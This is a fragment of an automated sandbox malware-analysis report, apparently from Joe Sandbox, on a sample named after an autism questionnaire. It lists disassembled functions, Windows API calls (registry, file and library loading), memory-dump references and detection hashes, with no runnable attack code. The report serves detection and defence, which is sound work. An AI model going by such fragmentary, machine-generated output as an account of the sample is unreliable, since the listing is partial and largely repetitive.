                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick
                                                                                              • String ID: Failed to remove temporary directory: $bm
                                                                                              • API String ID: 536389180-2673898769
                                                                                              • Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                                                              • Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
                                                                                              • Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                                                              • Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006AC180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID: RegisteredOrganization$RegisteredOwner
                                                                                              • API String ID: 3535843008-1113070880
                                                                                              • Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                                                              • Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
                                                                                              • Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                                                              • Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040952E, Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0040959A
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00009530), ref: 004095D7
                                                                                              • RtlUnwind.KERNEL32(?,?,Function_00009530,00000000,?,?,Function_00009530,?), ref: 00409602
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$Unwind
                                                                                              • String ID:
                                                                                              • API String ID: 1141220122-0
                                                                                              • Opcode ID: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                                                              • Instruction ID: e545f85d7011ee45bc6c766d7eccadc728dc4c1814e3ea314169116c21f0ec9d
                                                                                              • Opcode Fuzzy Hash: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                                                              • Instruction Fuzzy Hash: 8C3180B1604200AFD720DB15CC84F67B7E5EB84714F14896AF408972A3CB39EC84CB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414DA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID: TWindowDisabler-Window
                                                                                              • API String ID: 716092398-1824977358
                                                                                              • Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                                                              • Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
                                                                                              • Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                                                              • Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006AC0D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpen
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 47109696-1019749484
                                                                                              • Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                                                              • Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
                                                                                              • Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                                                              • Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C7A14, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                                              Strings
                                                                                              • Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                              • API String ID: 71445658-1109908249
                                                                                              • Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                                                              • Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
                                                                                              • Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                                                              • Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060DCC8, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
                                                                                              • FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileNext
                                                                                              • String ID:
                                                                                              • API String ID: 2066263336-0
                                                                                              • Opcode ID: 307229220045934514f2797ae1fd56983498e0d597fc7926d6d01a7b579ae072
                                                                                              • Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
                                                                                              • Opcode Fuzzy Hash: 307229220045934514f2797ae1fd56983498e0d597fc7926d6d01a7b579ae072
                                                                                              • Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C77F4, Relevance: 3.1, APIs: 2, Instructions: 112registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
                                                                                              • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                                                              • Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
                                                                                              • Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                                                              • Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguage$SystemUser
                                                                                              • String ID:
                                                                                              • API String ID: 384301227-0
                                                                                              • Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                                                              • Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
                                                                                              • Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                                                              • Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileLibraryLoadModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 1159719554-0
                                                                                              • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                                              • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                                                              • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                                              • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005ABB4C, Relevance: 3.0, APIs: 2, Instructions: 50threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 005ABB9E
                                                                                              • EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CurrentEnumWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2396873506-0
                                                                                              • Opcode ID: c23ed00adf58bb8bc199d59d2893d5f3905464b9701e1995fcbbc01dd2e6c622
                                                                                              • Instruction ID: ee6e8008b641080cd7585ababab2aba3c455f5a37fbde39c0718e37cfc8f8a06
                                                                                              • Opcode Fuzzy Hash: c23ed00adf58bb8bc199d59d2893d5f3905464b9701e1995fcbbc01dd2e6c622
                                                                                              • Instruction Fuzzy Hash: C5112574A08744AFD711CF66DCA2D6ABFE9E74A720F1194AAE804D3791E7756C00CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060C158, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
                                                                                              • GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
